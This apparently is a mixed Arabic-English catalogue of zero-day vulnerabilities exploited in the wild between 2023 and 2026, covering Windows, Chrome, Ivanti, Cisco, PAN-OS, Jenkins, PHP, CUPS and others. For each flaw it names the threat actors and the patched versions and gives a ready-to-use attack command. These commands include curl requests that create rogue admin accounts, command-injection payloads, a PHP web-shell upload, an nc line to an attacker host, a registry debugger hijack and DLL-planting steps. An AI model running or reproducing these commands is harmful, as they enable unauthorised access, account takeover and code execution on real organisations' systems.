Recent Zero-Days (2023–2026) — اللي اشتغلت In-The-Wild

إساءة ملكية pointer للـ heap blob أثناء IKEv2 fragment reassembly. 4 حزم UDP إلى 500/4500 تكفي لـ SYSTEM RCE بدون تفاعل.

استغلال ميداني: Wormable RCE — public PoC dropped post-PT

# Targets any host with IPsec/Windows VPN role enabled.
python3 cve-2026-33824.py --target TARGET --port 500 --frags 4

الإصدار المرقَّع: Windows Apr 2026 Patch Tuesday (KB-2026-04)

حقل Office SharePoint يقبل قيم لا يفترض الوثوق بها → عرض/تعديل بيانات سرية. أُعلن عنها قبل صدور الرقعة.

استغلال ميداني: Targeted exploitation; CISA KEV deadline 2026-04-28

# Reference only — public exploit harness reaches /sites/<x>/_layouts/15/
python3 sp_32201.py --target https://TARGET --site sites/finance

الإصدار المرقَّع: SharePoint SE / 2019 / 2016 — Apr 2026 PT

خطأ في معالجة impersonation token داخل خدمة Defender يسمح لمستخدم محلي محدود الصلاحيات بالوصول إلى SYSTEM.

استغلال ميداني: PoC posted to GitHub by 'Chaotic Eclipse' Apr 3 2026

BlueHammer.exe   # public PoC; CISA ordered fed agencies patch by 2026-05-07

الإصدار المرقَّع: Defender platform update Apr 2026

حالة سباق في معالج الحزم تسمح لمهاجم عن بعد دون مصادقة بتنفيذ كود في kernel.

استغلال ميداني: ITW unconfirmed; rated wormable by MSRC

# Probabilistic; needs many crafted TCP segments at high rate.
python3 tcpip_33827.py --target TARGET --rate 50000

الإصدار المرقَّع: Windows Apr 2026 Patch Tuesday

ترقيع ناقص لـ CVE-2023-23397: حقول reminder بديلة لا تزال تجبر Outlook على المصادقة بـ NTLM ضد UNC مهاجم.

استغلال ميداني: APT28 follow-on after Microsoft's incomplete patch of CVE-2023-23397

# Send calendar invite; Outlook leaks NetNTLMv2 to attacker share.
responder -I eth0

الإصدار المرقَّع: Outlook Apr 2026 PT

صفحة HTML تستدعي WebGPU بطريقة تطلق GPU resource ثم تستخدمه → UAF يسمح بـ RCE داخل renderer.

استغلال ميداني: Targeted attacks on Saudi financial sector (since Mar 10 2026)

# Drive-by HTML page using GPUDevice.destroy() then dispatch.
<script>navigator.gpu.requestAdapter().then(...).then(d=>{d.destroy();/* reuse */})</script>

الإصدار المرقَّع: Chrome 146.0.7680.177/178 (مارس 2026)

صفحة HTML تستخدم canvas/path معينة تجبر Skia على كتابة خارج حدود buffer → فساد ذاكرة قابل للاستغلال.

استغلال ميداني: ITW since early March 2026

# Drive-by; chained with sandbox escape for full host RCE.
<canvas id=c></canvas><script>/* Skia path with crafted dimensions */</script>

الإصدار المرقَّع: Chrome 146.0.7680.80 (مارس 2026)

تنفيذ غير ملائم في V8 يسمح بـ type confusion يقود إلى تنفيذ كود داخل sandbox الـ renderer.

استغلال ميداني: Paired with CVE-2026-3909

// Public PoC: triggers JIT specialization on a tampered map
for(let i=0;i<2e4;i++)f(o); o.x = leak; f(o);

الإصدار المرقَّع: Chrome 146.0.7680.80 (مارس 2026)

Notepad++ يحمّل DLL من المسار الحالي قبل system32 → فتح ملف من مجلد يحوي DLL خبيث ينفذ كوداً بصلاحية المستخدم.

استغلال ميداني: Added to CISA KEV 2026-02-13

# Drop dwmapi.dll (or affected DLL) next to a benign .txt; victim opens it.
cp evil.dll \\\\share\\docs\\dwmapi.dll

الإصدار المرقَّع: Notepad++ 8.x update (early 2026)

تلاعب بـ JWT/Cookie في API الإدارة يسمح بإنشاء مدير شبكة جديد ثم دفع تكوينات خبيثة لجميع routers الفرع.

استغلال ميداني: ITW; one of three SD-WAN flaws CISA added Feb 2026

curl -k 'https://VMANAGE/dataservice/admin/user' \
  -H 'Cookie: JSESSIONID=forged' -H 'X-XSRF-TOKEN: forged' \
  -d '{"userName":"pwn","password":"Pwn123!","group":["netadmin"]}'

الإصدار المرقَّع: Cisco SD-WAN 20.x فبراير 2026

قيمة كوكي SESSID تُمرَّر إلى shell بدون تعقيم → RCE بصلاحية root.

استغلال ميداني: UTA0218 / Operation MidnightEclipse

curl -k 'https://TARGET/ssl-vpn/hipreport.esp' \
  -H "Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/css/`id`"

الإصدار المرقَّع: PAN-OS 10.2.9-h1, 11.0.4-h1, 11.1.2-h3 (أبريل 2024)

Path traversal لتجاوز المصادقة، ثم حقن أوامر في /api/v1/license/keys-status/.

استغلال ميداني: UNC5221 / mass exploitation Jan 2024

curl -k 'https://TARGET/api/v1/totp/user-backup-code/../../license/keys-status/;id;'

الإصدار المرقَّع: Ivanti ICS 9.1R18.3 / 22.5R2.2 (يناير 2024)

POST إلى SetupWizard.aspx/anything يعيد تشغيل الإعداد وينشئ admin.

استغلال ميداني: Black Basta, LockBit affiliates

curl -k 'https://TARGET/SetupWizard.aspx/x' \
  -d 'Email=a@a.a&Password=Pwn123!&UserName=pwn&CompanyInformation.Name=x'

الإصدار المرقَّع: ScreenConnect 23.9.8 (فبراير 2024)

إضافة ?jsp=...;.jsp تخدع موجه المسارات → الوصول لواجهات admin بدون مصادقة.

استغلال ميداني: Lazarus, BianLian

curl -X POST 'https://TARGET/hax?jsp=/app/rest/users;.jsp' \
  -H 'Content-Type: application/json' \
  -d '{"username":"pwn","password":"Pwn123!","email":"x@x","roles":{"role":[{"roleId":"SYSTEM_ADMIN","scope":"g"}]}}'

الإصدار المرقَّع: TeamCity 2023.11.4 (مارس 2024)

args4j يفك '@file' كملف فعلي → قراءة secrets, hudson.util.Secret keys ثم RCE.

استغلال ميداني: Mass scanning + ransomware crews

java -jar jenkins-cli.jar -s https://TARGET/ connect-node "@/etc/passwd"

الإصدار المرقَّع: Jenkins 2.442 / LTS 2.426.3 (يناير 2024)

Best-fit Unicode يحوّل soft-hyphen إلى '-' → تمرير -d allow_url_include=1.

استغلال ميداني: TellYouThePass ransomware

curl 'http://TARGET/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input' \
  --data '<?php system($_GET[0]);?>&0=id'

الإصدار المرقَّع: PHP 8.1.29, 8.2.20, 8.3.8 (يونيو 2024)

الـ signal handler يُستدعى بعد timeout أثناء async-unsafe → استغلال heap على glibc.

استغلال ميداني: PoC public; targeted use suspected

# Public PoC, thousands of attempts; not stealthy.
python3 regreSSHion.py -t TARGET -p 22 --threads 10000

الإصدار المرقَّع: OpenSSH 9.8p1 (يوليو 2024)

حزمة UDP/631 تُجبر النظام على تثبيت طابعة خبيثة → FoomaticRIPCommandLine ينفذ أوامر.

استغلال ميداني: Public mass scanning Sept 2024

echo -n '0 3 http://ATTACKER:8631/printers/x' | nc -u TARGET 631

الإصدار المرقَّع: cups-browsed disabled / patched (سبتمبر 2024)

حزم IPv6 مجزأة مصاغة تسبب integer underflow في tcpip.sys → kernel RCE.

استغلال ميداني: No public ITW; severe risk

# Disable IPv6 if unneeded; PoCs require kernel-level fragment crafting.
python3 ipv6_rce_poc.py --target TARGET --frags 100

الإصدار المرقَّع: Windows Aug 2024 Patch Tuesday

license blob كبيرة في CDataCoding::GetEncodedSize تسبب فيض → RCE قبل المصادقة.

استغلال ميداني: PoC public

python3 madlicense_poc.py TARGET 3389

الإصدار المرقَّع: Windows Jul 2024 Patch Tuesday

ملف .url يشير لـ SMB share يحتوي .url آخر → ينفذ بدون تحذير SmartScreen.

استغلال ميداني: Water Hydra (DarkMe RAT) on traders

# attacker.url
[InternetShortcut]
URL=file://ATTACKER/share/payload.url

الإصدار المرقَّع: Windows Feb 2024 Patch Tuesday

CCoreWindow::ProcessMouseInput تحسب طول خاطئ → LPE من user إلى SYSTEM.

استغلال ميداني: QakBot operators

# Local; chained behind a phishing payload by QakBot.
dwm_lpe.exe

الإصدار المرقَّع: Windows May 2024 Patch Tuesday

ACL ضعيفة على HKLM\\...\\WerFault.exe → استبدال البرنامج المنفذ كـ SYSTEM.

استغلال ميداني: Black Basta affiliates

reg add "HKLM\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Hangs" /v Debugger /t REG_SZ /d "C:\\evil.exe" /f

الإصدار المرقَّع: Windows Mar 2024 Patch Tuesday

مستند RTF يحمّل HTML من SMB يستدعي ms-search:// لتنفيذ payload.

استغلال ميداني: Storm-0978 (RomCom) vs. NATO

# Lure .docx → remote template → search-ms:displayname=…&crumb=…

الإصدار المرقَّع: Microsoft Aug 2023 Patch Tuesday

PidLidReminderFileParameter يشير إلى UNC مهاجم → Outlook يصادق ويسرّب hash.

استغلال ميداني: APT28 (Fancy Bear) vs. EU/NATO

# Send calendar invite with PidLidReminderFileParameter = \\\\ATTACKER\\share\\x.wav
responder -I eth0   # capture NetNTLMv2

الإصدار المرقَّع: Outlook Mar 2023 Patch Tuesday

خطأ في base log file parsing → كتابة kernel arbitrary → SYSTEM.

استغلال ميداني: Nokoyawa ransomware

clfs_lpe.exe   # public PoCs widely available

الإصدار المرقَّع: Windows Apr 2023 Patch Tuesday

أسماء ملفات داخل tar تُمرَّر إلى qx() في Perl → RCE قبل المصادقة.

استغلال ميداني: UNC4841 (China) — global espionage

tar cf x.tar --transform 's/x/`id`/' x   # email .tar to scanned address

الإصدار المرقَّع: Barracuda recommended replacing the appliance (مايو 2023)

SQL injection يؤدي لاسترجاع keys ثم رفع webshell (human2.aspx).

استغلال ميداني: CL0P — 2,700+ orgs breached

curl 'https://TARGET/api/v1/folders/-1/files' -X POST --data 'sql=…'   # see public PoCs

الإصدار المرقَّع: MOVEit 2023.0.1 / 2022.x hotfixes (يونيو 2023)

إساءة استخدام installer endpoint لإنشاء مستخدم admin، ثم رفع implant.

استغلال ميداني: Tens of thousands of routers backdoored

curl -kX POST 'https://TARGET/webui_wsma_HTTP' --data '<request>…create user pwn priv 15…</request>'

الإصدار المرقَّع: Cisco IOS XE 17.x فيكسات أكتوبر 2023

/server-info.action?bootstrapStatusProvider… يمرر setupComplete=false → مسار setup مكشوف.

استغلال ميداني: Storm-0062 (DarkShadow)

curl 'https://TARGET/server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false'
curl 'https://TARGET/setup/setupadministrator.action' --data 'username=pwn&password=Pwn123!…'

الإصدار المرقَّع: Confluence 8.3.3 / 8.4.3 / 8.5.2 (أكتوبر 2023)

طلب HTTP إلى /oauth/idp/.well-known يعيد جزء من ذاكرة بها session tokens.

استغلال ميداني: LockBit on Boeing, ICBC, DP World

curl -k 'https://TARGET/oauth/idp/.well-known/openid-configuration' \
  -H "Host: $(python -c 'print(\"a\"*24812)')"

الإصدار المرقَّع: NetScaler 13.1-49.15 / 14.1-8.50 (أكتوبر 2023)

Stack overflow في معالجة SAML — حقل GET كبير → تنفيذ كود.

استغلال ميداني: China-nexus on US critical infra

# Public PoC overwrites return address; payload spawns nobody shell
python3 cve-2023-3519.py -t TARGET

الإصدار المرقَّع: Citrix ADC 13.1-49.13 (يوليو 2023)

زيارة /app?service=page/SetupCompleted ترفع جلسة admin بدون كلمة سر.

استغلال ميداني: CL0P, Bl00dy, LockBit

curl 'https://TARGET:9192/app?service=page/SetupCompleted'
# then POST to /admin/jobs/log create a print-script that runs system commands

الإصدار المرقَّع: PaperCut 20.1.7 / 21.2.11 / 22.0.9 (مارس 2023)

مجلد بنفس اسم ملف PDF يجعل WinRAR يفتح سكربت .cmd بدلاً من المستند.

استغلال ميداني: Sandworm, APT28, APT29 lures

# layout inside zip:
report.pdf            <- decoy
report.pdf/           <- folder of same name
report.pdf/report.pdf .cmd   <- runs on double-click

الإصدار المرقَّع: WinRAR 6.23 (أغسطس 2023)

ردّ LDAP خبيث يسبب OOB read في wldap32 → DoS لـ LSASS على DC.

استغلال ميداني: PoC public Jan 2025

python3 ldap_nightmare.py --target DC.corp.local

الإصدار المرقَّع: Windows Dec 2024 Patch Tuesday

ثغرة جديدة في BLF parser → SYSTEM؛ مستخدمة من قبل عصابات الفدية.

استغلال ميداني: Exploited ITW prior to Dec 2024

clfs_lpe2024.exe

الإصدار المرقَّع: Windows Dec 2024 Patch Tuesday

حقل HTTP طويل في معالج VPN يكتب على stack → RCE قبل المصادقة.

استغلال ميداني: UNC5337 — Jan 2025 mass exploitation

# Public PoC drops a shell at /home/runtime/tmp/
python3 cve-2025-0282.py -t TARGET

الإصدار المرقَّع: Ivanti ICS 22.7R2.5 (يناير 2025)

I/O ring buffer overrun في Hyper-V kernel component → SYSTEM.

استغلال ميداني: ITW kernel LPE

hyperv_lpe.exe

الإصدار المرقَّع: Windows Jan 2025 Patch Tuesday

صفحة ويب خبيثة تخرج من رمل WebContent على iOS → تنفيذ خارج الـ sandbox.

استغلال ميداني: Targeted iOS attacks (very limited)

# Mobile drive-by on iOS < 18.3.2 / Safari 18.3.1

الإصدار المرقَّع: iOS 18.3.2 / Safari 18.3.1 (مارس 2025)

حقل header طويل يفيض stack في معالج VPN → RCE وزرع implant.

استغلال ميداني: UNC5221 — RESURGE & SPAWNCHIMERA implants

curl -k 'https://TARGET/' -H "X-Forwarded-For: $(python -c 'print(\"A\"*5000)')"

الإصدار المرقَّع: Ivanti ICS 22.7R2.6 (أبريل 2025)

machineKey مكشوف في القالب الافتراضي → صياغة __VIEWSTATE خبيث → RCE.

استغلال ميداني: Public ITW April 2025

ysoserial.exe -p ViewState -g TextFormattingRunProperties \
  --path=/portal/Default.aspx --validationkey=<PUBLIC> --validationalg=HMACSHA256 -c "cmd /c whoami"

الإصدار المرقَّع: CentreStack 16.4.10315.56368 (أبريل 2025)

صفحة ويب تتلاعب بـ animation timeline → UAF → تنفيذ كود في عملية المتصفح.

استغلال ميداني: RomCom (Storm-0978) drive-by

# Drive-by URL served by RomCom; chained with CVE-2024-49039 for SYSTEM.

الإصدار المرقَّع: Firefox 131.0.2 / ESR 115.16.1 (أكتوبر 2024)

نوع خاطئ في V8 يخرج للمتصفح ثم يفتح IE mode → استغلال mshtml للخروج إلى الـ host.

استغلال ميداني: Citrine Sleet (DPRK) — Chrome zero-day chain

# Watering-hole HTML loaded via Edge IE-mode lure (DPRK financial theme).

الإصدار المرقَّع: Chrome 128.0.6613.84 + Windows Aug 2024